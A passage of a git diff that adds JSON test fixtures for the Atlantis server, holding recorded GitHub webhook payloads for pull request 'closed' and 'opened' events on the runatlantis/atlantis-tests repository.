+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json
new file mode 100644
index 0000000000..cc281a8d7a
--- /dev/null
+++ b/server/testfixtures/githubPullRequestClosedEvent.json
@@ -0,0 +1,468 @@
+{
+ "action": "closed",
+ "number": 2,
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
+ "id": 193308707,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+ "number": 2,
+ "state": "closed",
+ "locked": false,
+ "title": "Add new project layouts",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "body": "",
+ "created_at": "2018-06-07T12:45:41Z",
+ "updated_at": "2018-06-16T16:55:19Z",
+ "closed_at": "2018-06-16T16:55:19Z",
+ "merged_at": null,
+ "merge_commit_sha": "e96e1cea0d79f4ff07845060ade0b21ff1ffe37f",
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "requested_reviewers": [
+
+ ],
+ "requested_teams": [
+
+ ],
+ "labels": [
+
+ ],
+ "milestone": null,
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+ "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
+ "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e",
+ "head": {
+ "label": "runatlantis:atlantisyaml",
+ "ref": "atlantisyaml",
+ "sha": "5e2d140b2d74bf61675677f01dc947ae8512e18e",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "base": {
+ "label": "runatlantis:master",
+ "ref": "master",
+ "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "_links": {
+ "self": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
+ },
+ "html": {
+ "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
+ },
+ "issue": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
+ },
+ "comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
+ },
+ "review_comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
+ },
+ "review_comment": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+ },
+ "commits": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
+ },
+ "statuses": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e"
+ }
+ },
+ "author_association": "OWNER",
+ "merged": false,
+ "mergeable": true,
+ "rebaseable": true,
+ "mergeable_state": "clean",
+ "merged_by": null,
+ "comments": 62,
+ "review_comments": 0,
+ "maintainer_can_modify": false,
+ "commits": 3,
+ "additions": 198,
+ "deletions": 8,
+ "changed_files": 24
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:17Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 8,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 1,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 1,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json
new file mode 100644
index 0000000000..03ee106b5e
--- /dev/null
+++ b/server/testfixtures/githubPullRequestOpenedEvent.json
@@ -0,0 +1,468 @@
+{
+ "action": "opened",
+ "number": 2,
+ "pull_request": {
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
+ "id": 194034250,
+ "node_id": "MDExOlB1bGxSZXF1ZXN0MTk0MDM0MjUw",
+ "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+ "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+ "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+ "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+ "number": 2,
+ "state": "open",
+ "locked": false,
+ "title": "branch",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "body": "",
+ "created_at": "2018-06-11T16:22:16Z",
+ "updated_at": "2018-06-11T16:22:16Z",
+ "closed_at": null,
+ "merged_at": null,
+ "merge_commit_sha": null,
+ "assignee": null,
+ "assignees": [
+
+ ],
+ "requested_reviewers": [
+
+ ],
+ "requested_teams": [
+
+ ],
+ "labels": [
+
+ ],
+ "milestone": null,
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+ "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
+ "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+ "head": {
+ "label": "runatlantis:branch",
+ "ref": "branch",
+ "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
